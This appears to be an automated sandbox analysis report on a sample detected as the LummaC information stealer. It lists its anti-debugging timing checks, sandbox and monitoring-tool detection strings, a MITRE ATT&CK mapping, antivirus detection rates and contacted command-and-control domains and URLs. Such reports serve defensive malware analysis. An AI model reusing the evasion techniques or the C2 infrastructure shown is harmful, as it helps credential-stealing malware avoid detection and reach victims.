      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C47C84 second address: C47C94 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA398747046h 0x00000008 je 00007FA398747046h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C5111A second address: C5111E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C5111E second address: C51124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C51124 second address: C51143 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA398518367h 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C51143 second address: C51166 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA398747052h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push ebx 0x0000000d push edi 0x0000000e je 00007FA398747046h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C5409C second address: C540A2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C5A131 second address: C5A136 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C5D54E second address: C5D567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FA398518356h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jno 00007FA398518356h 0x00000013 jns 00007FA398518356h 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C5D567 second address: C5D587 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FA398747057h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C62B47 second address: C62B4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C62B4F second address: C62B55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C62B55 second address: C62B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C62D23 second address: C62D2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C62E88 second address: C62E8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C6343D second address: C63443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C68C31 second address: C68C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C68C35 second address: C68C43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C68DC1 second address: C68DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA398518356h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C68DCB second address: C68DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C6A70A second address: C6A710 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C6A710 second address: C6A717 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C74A5E second address: C74A73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 jmp 00007FA39851835Eh 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C74A73 second address: C74A79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C8657E second address: C86582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C86582 second address: C8658A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C860DC second address: C860E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C860E4 second address: C860FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA398747050h 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C8625F second address: C8628D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA398518360h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FA398518368h 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C8628D second address: C86292 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C86292 second address: C862BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA398518365h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push esi 0x00000015 pop esi 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C9A96C second address: C9A997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA398747052h 0x00000008 push esi 0x00000009 pop esi 0x0000000a jc 00007FA398747046h 0x00000010 popad 0x00000011 push ebx 0x00000012 jmp 00007FA39874704Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C9AC67 second address: C9AC77 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jne 00007FA398518356h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C9AC77 second address: C9AC81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA398747046h 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C9AC81 second address: C9ACA7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FA398518363h 0x0000000d jmp 00007FA39851835Dh 0x00000012 jl 00007FA398518358h 0x00000018 push esi 0x00000019 pop esi 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C9ACA7 second address: C9ACAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C9ACAD second address: C9ACB7 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA398518356h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C9B376 second address: C9B37C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C9B37C second address: C9B394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA39851835Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C9B394 second address: C9B398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C9B398 second address: C9B39C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C9B4DF second address: C9B508 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA398747051h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b jmp 00007FA39874704Ch 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 pop esi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C9B644 second address: C9B64A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C9B64A second address: C9B64E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C9B64E second address: C9B654 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C9B654 second address: C9B65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: C9B65D second address: C9B663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: CA11AF second address: CA11B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: CA1413 second address: CA1431 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA398518365h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: CA1431 second address: CA143E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jp 00007FA39874704Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: CA143E second address: CA149D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 push 00000000h 0x00000008 push ebp 0x00000009 call 00007FA398518358h 0x0000000e pop ebp 0x0000000f mov dword ptr [esp+04h], ebp 0x00000013 add dword ptr [esp+04h], 00000014h 0x0000001b inc ebp 0x0000001c push ebp 0x0000001d ret 0x0000001e pop ebp 0x0000001f ret 0x00000020 mov dh, 3Ch 0x00000022 push 00000004h 0x00000024 push 00000000h 0x00000026 push ebp 0x00000027 call 00007FA398518358h 0x0000002c pop ebp 0x0000002d mov dword ptr [esp+04h], ebp 0x00000031 add dword ptr [esp+04h], 00000018h 0x00000039 inc ebp 0x0000003a push ebp 0x0000003b ret 0x0000003c pop ebp 0x0000003d ret 0x0000003e mov edx, 01EA4B11h 0x00000043 mov dx, bx 0x00000046 xor edx, dword ptr [ebp+122D265Dh] 0x0000004c push 991CC149h 0x00000051 push eax 0x00000052 push edx 0x00000053 push edi 0x00000054 pushad 0x00000055 popad 0x00000056 pop edi 0x00000057 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: CA1688 second address: CA1708 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FA398747046h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 jno 00007FA39874704Ch 0x00000017 push dword ptr [ebp+122D3761h] 0x0000001d movsx edx, cx 0x00000020 mov dword ptr [ebp+12469DCBh], edx 0x00000026 call 00007FA398747049h 0x0000002b jmp 00007FA39874704Fh 0x00000030 push eax 0x00000031 jmp 00007FA398747050h 0x00000036 mov eax, dword ptr [esp+04h] 0x0000003a push esi 0x0000003b jne 00007FA398747048h 0x00000041 push esi 0x00000042 pop esi 0x00000043 pop esi 0x00000044 mov eax, dword ptr [eax] 0x00000046 push esi 0x00000047 jmp 00007FA39874704Ch 0x0000004c pop esi 0x0000004d mov dword ptr [esp+04h], eax 0x00000051 jg 00007FA398747054h 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: CA30F6 second address: CA30FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: CA30FA second address: CA3103 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: CA3103 second address: CA3109 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: CA3109 second address: CA311C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 jns 00007FA398747046h 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRDTSC instruction interceptor: First address: BBC40B second address: BBC413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
      Tries to evade debugger and weak emulator (self modifying code)
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSpecial instruction interceptor: First address: A17B98 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSpecial instruction interceptor: First address: A17A72 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSpecial instruction interceptor: First address: BB392A instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSpecial instruction interceptor: First address: C386C2 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A182EA rdtsc 1_2_00A182EA
      Source: C:\Users\user\Desktop\mgEXk8ip26.exe TID: 7528Thread sleep time: -90000s >= -30000sJump to behavior
      Source: mgEXk8ip26.exe, mgEXk8ip26.exe, 00000001.00000002.2259848535.0000000000B92000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
      Source: mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000002.2260432379.00000000013B7000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241034266.00000000013B7000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231900797.0000000001410000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: mgEXk8ip26.exe, 00000001.00000002.2260559964.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2241410964.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231733459.0000000001410000.00000004.00000020.00020000.00000000.sdmp, mgEXk8ip26.exe, 00000001.00000003.2231900797.0000000001410000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
      Source: mgEXk8ip26.exe, 00000001.00000002.2259848535.0000000000B92000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging

      barindex
      Hides threads from debuggers
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeThread information set: HideFromDebuggerJump to behavior
      Tries to detect sandboxes and other dynamic analysis tools (window names)
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeOpen window title or class name: regmonclass
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeOpen window title or class name: gbdyllo
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeOpen window title or class name: procmon_window_class
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeOpen window title or class name: ollydbg
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeOpen window title or class name: filemonclass
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeFile opened: NTICE
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeFile opened: SICE
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeFile opened: SIWVID
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_00A182EA rdtsc 1_2_00A182EA
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeCode function: 1_2_009FC1F0 LdrInitializeThunk,1_2_009FC1F0

      HIPS / PFW / Operating System Protection Evasion

      barindex
      LummaC encrypted strings found
      Source: mgEXk8ip26.exeString found in binary or memory: rapeflowwj.lat
      Source: mgEXk8ip26.exeString found in binary or memory: sustainskelet.lat
      Source: mgEXk8ip26.exeString found in binary or memory: crosshuaht.lat
      Source: mgEXk8ip26.exeString found in binary or memory: energyaffai.lat
      Source: mgEXk8ip26.exeString found in binary or memory: aspecteirs.lat
      Source: mgEXk8ip26.exeString found in binary or memory: discokeyus.lat
      Source: mgEXk8ip26.exeString found in binary or memory: necklacebudi.lat
      Source: mgEXk8ip26.exeString found in binary or memory: sweepyribs.lat
      Source: mgEXk8ip26.exeString found in binary or memory: grannyejh.lat
      Source: mgEXk8ip26.exe, mgEXk8ip26.exe, 00000001.00000002.2259848535.0000000000B92000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: nI\uProgram Manager
      Source: mgEXk8ip26.exe, 00000001.00000002.2259848535.0000000000B92000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: onI\uProgram Manager
      Source: C:\Users\user\Desktop\mgEXk8ip26.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

      Remote Access Functionality

      barindex
      Yara detected LummaC Stealer
      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
      Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
      Command and Scripting Interpreter      		1
      DLL Side-Loading      		1
      Process Injection      		24
      Virtualization/Sandbox Evasion      		OS Credential Dumping641
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		11
      Encrypted Channel      		Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault Accounts1
      PowerShell      		Boot or Logon Initialization Scripts1
      DLL Side-Loading      		1
      Process Injection      		LSASS Memory24
      Virtualization/Sandbox Evasion      		Remote Desktop ProtocolData from Removable Media1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)11
      Deobfuscate/Decode Files or Information      		Security Account Manager2
      Process Discovery      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
      Obfuscated Files or Information      		NTDS23
      System Information Discovery      		Distributed Component Object ModelInput Capture114
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
      Software Packing      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      mgEXk8ip26.exe51%VirustotalBrowse
      mgEXk8ip26.exe58%ReversingLabsWin32.Trojan.Generic
      mgEXk8ip26.exe100%AviraTR/Crypt.XPACK.Gen
      mgEXk8ip26.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      No Antivirus matches

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      steamcommunity.com
      		104.102.49.254
      		truefalse
        		high
        lev-tolstoi.com
        		104.21.66.86
        		truefalse
          		high
          s-part-0035.t-0009.t-msedge.net
          		13.107.246.63
          		truefalse
            		high
            fp2e7a.wpc.phicdn.net
            		192.229.221.95
            		truefalse
              		high
              sustainskelet.lat
              		unknown
              		unknownfalse
                		high
                crosshuaht.lat
                		unknown
                		unknownfalse
                  		high
                  rapeflowwj.lat
                  		unknown
                  		unknownfalse
                    		high
                    grannyejh.lat
                    		unknown
                    		unknownfalse
                      		high
                      aspecteirs.lat
                      		unknown
                      		unknownfalse
                        		high
                        sweepyribs.lat
                        		unknown
                        		unknownfalse
                          		high
                          discokeyus.lat
                          		unknown
                          		unknownfalse
                            		high
                            energyaffai.lat
                            		unknown
                            		unknownfalse
                              		high
                              necklacebudi.lat
                              		unknown
                              		unknownfalse
                                		high

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                aspecteirs.latfalse
                                  		high
                                  sweepyribs.latfalse
                                    		high
                                    sustainskelet.latfalse
                                      		high
                                      rapeflowwj.latfalse
                                        		high
                                        https://steamcommunity.com/profiles/76561199724331900false
                                          		high
                                          energyaffai.latfalse
                                            		high
                                            https://lev-tolstoi.com/apifalse
                                              		high
                                              grannyejh.latfalse
                                                		high
                                                necklacebudi.latfalse
                                                  		high
                                                  crosshuaht.latfalse
                                                    		high

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
